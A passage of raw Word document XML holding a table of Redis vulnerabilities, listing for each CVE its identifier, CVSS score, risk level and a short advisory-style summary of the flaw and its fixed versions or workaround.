        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="7FC90D1E"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6B4AD88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E895CE6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76BDD2BF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0EE89F1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160B517" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6610004E"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6">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32761</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="63ED7F0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D2BADF1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FBCAAB3"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in-memory database that persists on disk. </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>A vulnerability involving out-of-bounds read and integer overflow to buffer overflow exists starting with version 2.2 and prior to versions 5.0.13, 6.0.15, and 6.2.5. On 32-bit systems, Redis `*BIT*` command are vulnerable to integer overflow that can potentially be exploited to corrupt the heap, leak arbitrary heap contents or trigger remote code execution. The vulnerability involves changing the default `proto-max-bulk-len` configuration parameter to a very large value and constructing specially crafted commands bit commands. This problem only affects Redis on 32-bit platforms, or compiled as a 32-bit binary. Redis versions 5.0.`3m 6.0.15, and 6.2.5 contain patches for this issue. An additional workaround to mitigate the problem without patching the `redis-server` executable is to prevent users from modifying the `proto-max-bulk-len` configuration parameter. This can be done using ACL to restrict unprivileged users from using the CONFIG SET command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="59CB81B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92FF063" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F25D790"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6F3CDBA4"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3DAAF0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CC31453" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="32EF5D4A"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5265973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78B260" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C5FCDC4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0B9B253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E670FF8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72DC61A6"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7">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-31294</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7D1CA40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9EFE894" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63BA4CAE"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before 6cbea7d allows a replica to cause an assertion failure in a primary server by sending a non-administrative command (specifically, a SET command). NOTE: this was fixed for Redis 6.2.x and 7.x in 2021. Versions before 6.2 were not intended to have safety guarantees related to this.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="47D5D9D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ECD5AD6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3722A9B8"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2134A26"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151D9AC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910785B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="37E6321F"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0E5C026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BC814D2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D3832C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="13244E5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AD42371" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3760AEF2"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8">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2022-36021</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3DEE17D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2DEEE18" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D610447"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in-memory database that persists on disk. Authenticated users can use string matching commands (like `SCAN` or `KEYS`) with a specially crafted pattern to trigger a denial-of-service attack on Redis, causing it to hang and consume 100% CPU time. The problem is fixed in Redis versions 6.0.18, 6.2.11, 7.0.9.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="316DB51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215A3A4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4333B32E"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58C82058"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3553CA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08DC1A3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="294A52BF"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21EF49E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803E520" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6879C108" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="3BC5AB5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3F27E93" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38EEC9EF"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199">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32675</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="741A4E2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94A25EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C9DFDB2"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open source, in-memory database that persists on disk. When parsing an incoming Redis Standard Protocol (RESP) request, Redis allocates memory according to user-specified values which determine the number of elements (in the multi-bulk header) and size of each element (in the bulk header). An attacker delivering specially crafted requests over multiple connections can cause the server to allocate significant amount of memory. Because the same parsing mechanism is used to handle authentication requests, this vulnerability can also be exploited by unauthenticated users. The problem is fixed in Redis versions 6.2.6, 6.0.16 and </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>5.0.14. An additional workaround to mitigate this problem without patching the redis-server executable is to block access to prevent unauthenticated users from connecting to Redis. This can be done in different ways: Using network access control tools like firewalls, iptables, security groups, etc. or Enabling TLS and requiring users to authenticate using client side certificates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="797CA6C2"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0355316" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08C144E4"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3E1648B4"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E71380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7EFEE57" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="4A976E59"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3B6BEAB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87E58E0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32247366" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="760A274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6186671" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="611ECF78"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0">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2015-8080</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7144316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E92A6B6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B1289FA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Integer overflow in the getnum function in lua_struct.c in Redis 2.8.x before 2.8.24 and 3.0.x before 3.0.6 allows context-dependent attackers with permission to run Lua code in a Redis session to cause a denial of service (memory corruption and application crash) or possibly bypass intended sandbox restrictions via a large number, which triggers a stack-based buffer overflow.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="48049AE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0275637" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60235F1C"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3B84332"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095D08E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EF6D1D7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="5DDD2EE6"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48FA8CA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12AFCC7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793031FC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1D02D43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EF1CE89" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D8D33A4"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1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-3470</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2431E281"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0937628" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042896E8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A heap overflow issue was found in Redis in versions before 5.0.10, before 6.0.9 and before 6.2.0 when using a heap allocator other than jemalloc or glibc's malloc, leading to potential out of bound write or process crash. Effectively this flaw does not affect the vast majority of users, who use jemalloc or glibc malloc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6A70144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8CB2663" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="148C6E4C"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68C6CA3F"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55239B15"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D49C6A7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="0256C080"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637E5B2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2015164" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="179C553A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="063831B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17AB84A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BFCA44E"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2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2020-21468</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0CD308AD"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4D8BFBB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A4038E1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="2A796FA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008EC5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B71DEB5"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0FBCAEAA"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29BB55A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4855931" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="1ABB97CD"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5AF9DE1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2D1109B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7976BB3C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="24E48440"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EC9E468" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="624C51A1"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3">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2021-32672</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="12A9CE9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DB26144" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F4A5B9F"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open source, in-memory database that persists on disk. When using the Redis Lua Debugger, users can send malformed requests that cause the debugger’s protocol parser to read data </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>beyond the actual buffer. This issue affects all versions of Redis with Lua debugging support (3.2 or newer). The problem is fixed in versions 6.2.6, 6.0.16 and 5.0.14.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7F95D529"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76712A8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6843796A"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321F7730"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13D709BE"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C2C387D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Risk level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF9B26"/>
          </w:tcPr>
          <w:p w14:paraId="477FFB43"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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="17B711F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B9D6DAE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="218573C5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6618B446"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53878C2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427D9061"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4">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVE-2020-14147</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5ED15E3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CC8D5DE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FC189D4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>An integer overflow in the getnum function in lua_struct.c in Redis before 6.0.3 allows context-dependent attackers with permission to run Lua code in a Redis session to cause a denial of service (memory corruption and application crash) or possibly bypass intended sandbox restrictions via a large number, which triggers a stack-based buffer overflow. NOTE: this issue exists because of a CVE-2015-8080 regression.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="606CC7A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11903EF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
